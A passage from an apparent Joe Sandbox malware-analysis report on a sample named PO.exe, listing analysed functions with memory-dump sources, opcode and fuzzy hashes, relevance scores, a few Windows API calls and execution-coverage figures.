String ID:
API String ID:
Opcode ID: fb706422ea0bdf01958f6ef499bd62c0df19cd7e67e0ee345376810a90f73d8d
Instruction ID: 72d11f2ca83069fabf57ae311f71548f707e17c1bf0094b9c41e72671b0f5ffb
Opcode Fuzzy Hash: fb706422ea0bdf01958f6ef499bd62c0df19cd7e67e0ee345376810a90f73d8d
Instruction Fuzzy Hash: 8901C831E08120BBF7209A55CC50A36B7A9FBC5642BD8C62B9C179B744C922D80A8B91

Function 0155D2C3 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_155d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 3f4754fb0a7951fef35c3bf869f704f291000e72490761713a25d894ca3e1a48
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: 4811A976504280DFDB06CF64D594B19BBB2FB84314F24C6AADC094F657C33AD40ACB61

Function 0A721EA0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8cd73670c0b7397db14658d403507b7c3ef4416fdef25cc543c221ba601ca6
Instruction ID: 65743b1ac2706d85a660def7d2e18143483b909eab8c663b872a8a6cb5415ff1
Opcode Fuzzy Hash: 8f8cd73670c0b7397db14658d403507b7c3ef4416fdef25cc543c221ba601ca6
Instruction Fuzzy Hash: 2101DD31F08134FBB7249959CC50977B7AAFBC56427D4C62B9C1797744CA329C0ACB51

Function 0154D7DD Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_154d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa7fbaac91d2bacafdef57fb32d8804bcfeb9d59a6171609ac066f1d905d102
Instruction ID: bac3b230e473fb413f89c4ebb9bd169dca384afc5aaf3d7d09e7ba2baa0a5bf5
Opcode Fuzzy Hash: faa7fbaac91d2bacafdef57fb32d8804bcfeb9d59a6171609ac066f1d905d102
Instruction Fuzzy Hash: 5601A7714053449BF7118A99CD84776FFE8FFA1338F18C45AED0D0E286D6759840CAB1

Function 0A7202D0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf12ba551ec3a85427e2f4b55c249cc021735b6abface538ae3284c3b769ec9
Instruction ID: 2edc7740c4c0e5f1a8032cdbb7a560867f08b30b766393fbe2a79f725f7af60d
Opcode Fuzzy Hash: 0cf12ba551ec3a85427e2f4b55c249cc021735b6abface538ae3284c3b769ec9
Instruction Fuzzy Hash: 3911A278E082689FDB65CF99DC90ADDBBB5BF49300F1480A9D40DAB255D7305D46CF40

Function 0A7203EC Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a79d2e2ffcfab5829f359f1b6f213020c3c89235535795ebe8e0c4eb4aab71c
Instruction ID: 8052a0a1595dca5ede926f3ac49b4cbfcd5d2b3e28ec7609fa62af04cb3c37b6
Opcode Fuzzy Hash: 7a79d2e2ffcfab5829f359f1b6f213020c3c89235535795ebe8e0c4eb4aab71c
Instruction Fuzzy Hash: 38019278E08228DFDB64CF95D880ADDBBB6BB48700F109099D50EAB255D7305E46CF40

Function 0154D7DC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_154d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f1b29ec8cb147adb4e381733fd0be0b8d2f4ccadd68d4a0f9e6d3263c7e85a
Instruction ID: e12406201b1d457a584e1dee0cf1446c70aea17a76691265b97fb9df1afe13f0
Opcode Fuzzy Hash: 62f1b29ec8cb147adb4e381733fd0be0b8d2f4ccadd68d4a0f9e6d3263c7e85a
Instruction Fuzzy Hash: 6AF06272404344ABF7118A59CD84B76FFE8EB91634F18C45AED4C5E286C3799844DA71

Function 0A720258 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd71d9ecbcec1b71549ebac56ce1b16f8e77ca0b508553ebe9079293a19888b5
Instruction ID: 6743d2076f762ec1950f96d8576371b1a485e868199699181b9bbda88f8922d7
Opcode Fuzzy Hash: dd71d9ecbcec1b71549ebac56ce1b16f8e77ca0b508553ebe9079293a19888b5
Instruction Fuzzy Hash: 43011D39849268CFDB74CF15C8447F8B7B4EB4A321F04D5AA840DA6292C6344ECACF60

Function 0A721667 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01f275a223936add50d180cf5e443e0044c5821b9d2f6a4c12f3a6e0661b928
Instruction ID: 3ab1271f3edb4e46f8b1018d019f3e7509109e4244b89496959b5f0f5552c8d2
Opcode Fuzzy Hash: b01f275a223936add50d180cf5e443e0044c5821b9d2f6a4c12f3a6e0661b928
Instruction Fuzzy Hash: 57F0E9357093A05BDB269626D8653D97F669FC3614B0D40BFD4848B187CD58480587D6

Function 0A720778 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5766f0211f0b2d405595ff6f64fff09ca85facb49a87567b2d86741a275b7cb9
Instruction ID: 1285627de23bc8e8bda344c11dcf8b31d89e8c595986082316df0e8ff86a6964
Opcode Fuzzy Hash: 5766f0211f0b2d405595ff6f64fff09ca85facb49a87567b2d86741a275b7cb9
Instruction Fuzzy Hash: 92F04F34909228CFEB50CE24C984BE8B7B4AB05300F1490D9D04EA7252C7355F8ACF10

Function 0A72062D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8154616e28e29ffa75954e259c8251722b676b4deb18f027e045fd8b597e4ff
Instruction ID: 82e8bdf561b2eff03cb8cedfeda837aaea65380a1d91621e97aacebb2263223d
Opcode Fuzzy Hash: e8154616e28e29ffa75954e259c8251722b676b4deb18f027e045fd8b597e4ff
Instruction Fuzzy Hash: 470169359082A89FCB61CF64CD906E8BFB5EF0A300F1440E9D449A72A2C7355E86CF11

Function 0A72083A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 840a2c53b754c8a81c62bc1a50769168edec0af760d503fb59556b8ff7e3e571
Instruction ID: 31858ab056e984efa7030bf0a91d17115a36389602e122693f11365353b2e08c
Opcode Fuzzy Hash: 840a2c53b754c8a81c62bc1a50769168edec0af760d503fb59556b8ff7e3e571
Instruction Fuzzy Hash: 28F0C478A082189FDB65CFA5DC80AE9BBB9BB49310F1090A9D50DAB251D7355D42CF50

Function 0A720246 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501b0fc1d77094cc8260453a1b729f9058d10065eaa326efaf155230ba7572cb
Instruction ID: ac3895b3d90c3417e73d0bd3e35ebeac71570fac0ba77e8104d7c3f3c085e094
Opcode Fuzzy Hash: 501b0fc1d77094cc8260453a1b729f9058d10065eaa326efaf155230ba7572cb
Instruction Fuzzy Hash: 9401F678904228DFCB65CF64C8957D8BBF0BB4A314F1485DA891DA3282C7758ECACF40

Function 0A720489 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46f5a07c62dee08bb3c7ea26e47480c9ef624cabd4a1e46771568aae5099baf3
Instruction ID: c4d54f19cd031d0ae2f029f5db13bae9166855f22d53e919d3695b8898c1d5e4
Opcode Fuzzy Hash: 46f5a07c62dee08bb3c7ea26e47480c9ef624cabd4a1e46771568aae5099baf3
Instruction Fuzzy Hash: D0F0E275904228DFDB60CF64DC44BD8BBF4EB48305F10809AD509A7241D7349E85CF54

Function 0A72052A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25bd4d7ba145176d3dd7e798f8a955be2d1317b7cfbfff11df93d809f80f8bb
Instruction ID: aca10e2f0ba467dd089db2f68d4bd4955eeaf32e46e38b69e9ace0f9c76d53f7
Opcode Fuzzy Hash: c25bd4d7ba145176d3dd7e798f8a955be2d1317b7cfbfff11df93d809f80f8bb
Instruction Fuzzy Hash: C4F017758043589FCB51CF64CC44BD9BBF4AB46310F1481DAD508AB292D7799E85CF54

Function 0A720AFE Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e5bd929e3ef255a2c06753ea1e78199a129f1d543259483c9e019bb4c5f140
Instruction ID: c86b3f490db8ca7c844c53c11e0404bc6eed1949d9a87c9aebf5fb75bec7584e
Opcode Fuzzy Hash: 00e5bd929e3ef255a2c06753ea1e78199a129f1d543259483c9e019bb4c5f140
Instruction Fuzzy Hash: 4AF09276904228DFCB64DFA4CD80BDDBBB5FB48301F6040EA9109A7261DB369E86DF44

Function 0A721F54 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8028963ecec88931a3a5995916aff4036f91959caaa419acedda8024a61a9454
Instruction ID: 562cda5824aa65371a9dab992710f7313d4e9376ff08e38d71f871021c8ee509
Opcode Fuzzy Hash: 8028963ecec88931a3a5995916aff4036f91959caaa419acedda8024a61a9454
Instruction Fuzzy Hash: 87E026F3A0D060BFF3214688AC60030BB94FAE21523C8C6CBD446CB562D706D10BD310

Function 0A7204AA Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d5ac6d59200215884bf55dc992d19fc56598d8f65f4d6dbc13b5bebc58d0f1
Instruction ID: 8ab725f8e139de2fbf8b6fff18b1e085438b7999f20b5e9400c5b43c520b25b5
Opcode Fuzzy Hash: 63d5ac6d59200215884bf55dc992d19fc56598d8f65f4d6dbc13b5bebc58d0f1
Instruction Fuzzy Hash: FAE0C938404269DFEB74CF55C8447E8BBB8AB4A310F14C29A841966292C2359F8BCF60

Function 0A720E70 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5b7671ee5b5cab33e473f0defdc9bc9feb9b67a60a2056be16854696267e6b
Instruction ID: d3945aa865bd1c49dbaa4b0573e9f47d0d4700cdd76576b047969700a6c9d9bb
Opcode Fuzzy Hash: ba5b7671ee5b5cab33e473f0defdc9bc9feb9b67a60a2056be16854696267e6b
Instruction Fuzzy Hash: 23E02B7180120CEFE314E774E812B997768CF01221F1440AED404D7212CB399F50CB91

Function 0A721678 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e477d79d3a19e42e8197400df0a4edb04619d92f8249229a2f221c9732ebaf56
Instruction ID: 42388fcbd055901a3a4c2615b05b0add3c232c4816979d611ddb1e34236bc1c8
Opcode Fuzzy Hash: e477d79d3a19e42e8197400df0a4edb04619d92f8249229a2f221c9732ebaf56
Instruction Fuzzy Hash: A1D02336710534934915311F78244FFB94FDAC5F21606402FF10D8734CCD654C0507D5

Function 0A720731 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46328f673660d48cd1efdd7cedde7c06d3b5db59335d392abbc2b17f3381001e
Instruction ID: ac66763879d79a149d4d10bb751648d1332bda25042a04ad3176fb56f9c4ec7d
Opcode Fuzzy Hash: 46328f673660d48cd1efdd7cedde7c06d3b5db59335d392abbc2b17f3381001e
Instruction Fuzzy Hash: 7AE0B638904128DFCB24CF60CA44AE8BBF5AB49304F04D4EA8409A7252C3359E8ACF50

Function 0A720E80 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecab70d5d5f42dea2224a7a81c74a16dea80b464511f9cfd997f691d08aced1d
Instruction ID: 3171ed9aec54c99f6dfed209cb63041c893ec5ded9b870b29870ad2ceed2014a
Opcode Fuzzy Hash: ecab70d5d5f42dea2224a7a81c74a16dea80b464511f9cfd997f691d08aced1d
Instruction Fuzzy Hash: FCD02270C0220CDBE328EBB8E001A9D773CDF01211F1000BDC40407210CB764E81CF91

Function 0A72068C Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f0c7c8a9e2d36f744a3c9aa0eb7e4a1d924b7afcabd5008bdcc534ed4f2cbc
Instruction ID: 226f51b1cb096b59ac42eadd8ab8e39cd55073a5d11895b1af8e9d13fbdd9caa
Opcode Fuzzy Hash: 83f0c7c8a9e2d36f744a3c9aa0eb7e4a1d924b7afcabd5008bdcc534ed4f2cbc
Instruction Fuzzy Hash: 64E0BD38904228CFCB20CF60CA40AE8BBF5AB49304F04C4EA8409A7252C33A9E86CF40

Analysis Process: PO.exePID: 7912, Parent PID: 7400COMMON

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	1

Executed Functions

Function 06AC6F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AC74A6), ref: 06AC7656

Memory Dump Source

Source File: 0000000F.00000002.2275732228.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ac0000_PO.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 88977afe4cca94dd124d9eb585ccad688bb2c4c40b9c393db4a8c68add3afb87
Instruction ID: c664c20c5319f7f0bcfe94b9b79b5fe8f305c4250de9f0a6d8a45abd769d9375
Opcode Fuzzy Hash: 88977afe4cca94dd124d9eb585ccad688bb2c4c40b9c393db4a8c68add3afb87
Instruction Fuzzy Hash: D711E2B6D006498FDB10DF9AC844A9EFBF4EF88320F14841AE419B7310D775A545CFA5

Function 06AC75E8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AC74A6), ref: 06AC7656

Memory Dump Source

Source File: 0000000F.00000002.2275732228.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ac0000_PO.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e5805706e2bfdaedaa66e8f090fc9afa411f9616f41e4de0a4c2581efd500bd
Instruction ID: aeee12887986e80a8b0c6b77ab5d8cf86be3956153f1159b2e857ec8fee4907a
Opcode Fuzzy Hash: 6e5805706e2bfdaedaa66e8f090fc9afa411f9616f41e4de0a4c2581efd500bd
Instruction Fuzzy Hash: A81123B6C006498FCB20DF9AC844ADEFBF4EF88320F14842AE419A7310D375A545CFA0

Function 014B0CE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 014B0D47

Memory Dump Source

Source File: 0000000F.00000002.2264252460.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14b0000_PO.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 16d39ce1958365333a54998d0cedaad0bed13dbd96533aeb2927ab29300ef7a7
Instruction ID: a1607277f06a37c99e3cf13b8bb9368c6d5350aed1b6643bf5e4dc199e34a531
Opcode Fuzzy Hash: 16d39ce1958365333a54998d0cedaad0bed13dbd96533aeb2927ab29300ef7a7
Instruction Fuzzy Hash: D61128759102098FDB24DFAAC9897DFBBF5EF88320F14881AD419A7250CB35A545CBA4

Function 014B0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 014B0D47

Memory Dump Source

Source File: 0000000F.00000002.2264252460.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_14b0000_PO.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: d69221c1e3e8c87d6a2ef9c5720b7bb72faf2541e230bc88d5b51a01bbc661df
Instruction ID: 53b8fe021c5ca9a6d06af3e07767073ff5721739ff6750bff3f2549c3213f492
Opcode Fuzzy Hash: d69221c1e3e8c87d6a2ef9c5720b7bb72faf2541e230bc88d5b51a01bbc661df
Instruction Fuzzy Hash: D71125719002098FDB20DFAAC8857DFBFF8EF48320F14841AD519A7250CB39A5448BA0

Function 06B11550 Relevance: 1.4, Instructions: 1417COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a9e775b53db7ceabe66b4ce4ffc0b2063702dcfd9039c16b69b8bb6e315db8
Instruction ID: dd572335965b3e417b5063f3514fa787d98d35eb3ecbc43f2cb84e1b4f8e45a0
Opcode Fuzzy Hash: 94a9e775b53db7ceabe66b4ce4ffc0b2063702dcfd9039c16b69b8bb6e315db8
Instruction Fuzzy Hash: F0C26D75E002189FCB55CF58C851EADBBB2FF88704F5180D9E606AB361DB71AE818F91

Function 06B1349D Relevance: 1.3, Instructions: 1296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb82ee272d62e06315d90bf0bb7fe2483cf4afe1271ead6f7e26fae5ab0c98e
Instruction ID: 68e3dfec9913f63a016f90e4cdd47b6c3cf1b456693450aa34dcf776a370e316
Opcode Fuzzy Hash: 0eb82ee272d62e06315d90bf0bb7fe2483cf4afe1271ead6f7e26fae5ab0c98e
Instruction Fuzzy Hash: 89B1C3B4B042449FCB55CB78C854E6EBBF2EF89704B5484AAE916DB3A1DB30DC05CB51

Function 06B10048 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad5bb907ffb1472f236191dad181cf0ae30beced7c37429b27679b58233d78a
Instruction ID: 50e9cf5faec780e9a745d7b74d0794b02b18451f14a895825e72dc56b0e4b569
Opcode Fuzzy Hash: dad5bb907ffb1472f236191dad181cf0ae30beced7c37429b27679b58233d78a
Instruction Fuzzy Hash: D54269B0700A258FCB65AF68D45066EBBB2FFC1704B414A9CD503AF391CB79ED858B85

Function 06B10000 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa8b040997e88cf4a2afcceb61f0b469b2a689e22d175e665ae5933b26398ad
Instruction ID: 18033d31bb8cb9961ff86db7e7e34a1036c71b83e0010872cfd0b18ff7911a5e
Opcode Fuzzy Hash: 9fa8b040997e88cf4a2afcceb61f0b469b2a689e22d175e665ae5933b26398ad
Instruction Fuzzy Hash: 54D1C1B0B00608DFDB41DF64C855A6A7BB6FF89704F50819AE9029F3A2CBB1DD45CB91

Function 06B11534 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6caf59e0dde6c93433110a497b9fd90f464067a140d12e414abe076b81988d1
Instruction ID: 12f5f9b8b2f752842d46fcbab7c038b2550571b616675700ea50e482c727e4a9
Opcode Fuzzy Hash: e6caf59e0dde6c93433110a497b9fd90f464067a140d12e414abe076b81988d1
Instruction Fuzzy Hash: 2AC15939B50104AFCB44CF98C895E9DBBB2FF89704B508099EA029F361CA72FD158B55

Function 06B10046 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e265ef6ec8df5e1cb4d4d41af7ce2257bf8ce23c092f4b3a14e755d2791b8710
Instruction ID: 4670dac76d3da6da03160d7d4d3e7a5760bba6055e44bf85c3e9404b1e834f54
Opcode Fuzzy Hash: e265ef6ec8df5e1cb4d4d41af7ce2257bf8ce23c092f4b3a14e755d2791b8710
Instruction Fuzzy Hash: 73C15FB0B00608EFDB44DF65C855A6A7BB6FF88704F508199E9029F3A1CBB1DD85CB91

Function 06B13138 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3586252ba064ea058b0f4400fa4f78bb9a3762b7f66837bd2165a446eef74378
Instruction ID: 65873437b4028e3afb674bb3e7c00515ed8fafc79684c1a0ec49bb6eb815d5c0
Opcode Fuzzy Hash: 3586252ba064ea058b0f4400fa4f78bb9a3762b7f66837bd2165a446eef74378
Instruction Fuzzy Hash: 21918F75B50204AFCB54DF69C894E9ABBF2FF89710B1580A9E9059F362DB31EC01CB91

Function 06B11308 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6b10000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f289c309a13dee96554fc086df15abe00d6bd76a97fe465d4228a2ed043fbd8a
Instruction ID: 191e6d2b6a36c01f6feedfeb22539b1447a0c1c9271d850b51c8ae66e7c0d9ed
Opcode Fuzzy Hash: f289c309a13dee96554fc086df15abe00d6bd76a97fe465d4228a2ed043fbd8a
Instruction Fuzzy Hash: B3616A71704745EFCB61AF7ED84046ABBA6EFC1220B6481BFDA058F654EB31C841C7A1

Function 0134D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2263097497.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_134d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53db5ba2026fef8adbaaf4db191a1c664dde4bfcf0762f7a8d93d237f895b828
Instruction ID: 838ee93920df925c42a08e6ce7a706801442a36d58acd09ee76bb8b2d4db133f
Opcode Fuzzy Hash: 53db5ba2026fef8adbaaf4db191a1c664dde4bfcf0762f7a8d93d237f895b828
Instruction Fuzzy Hash: C0214872504244DFCF16DF98D8C0B26BFA5FB98318F24C668ED090B646C33AE416CBA1

Function 0135D2F4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2263159684.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_135d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34e0d36b938da35a9516c9212f34995d5994987203f748863bd279e1032d254
Instruction ID: 609290f255c789113ba7a5e26ee933631d0a798975e576cce3f2ab2a17469e1d
Opcode Fuzzy Hash: d34e0d36b938da35a9516c9212f34995d5994987203f748863bd279e1032d254
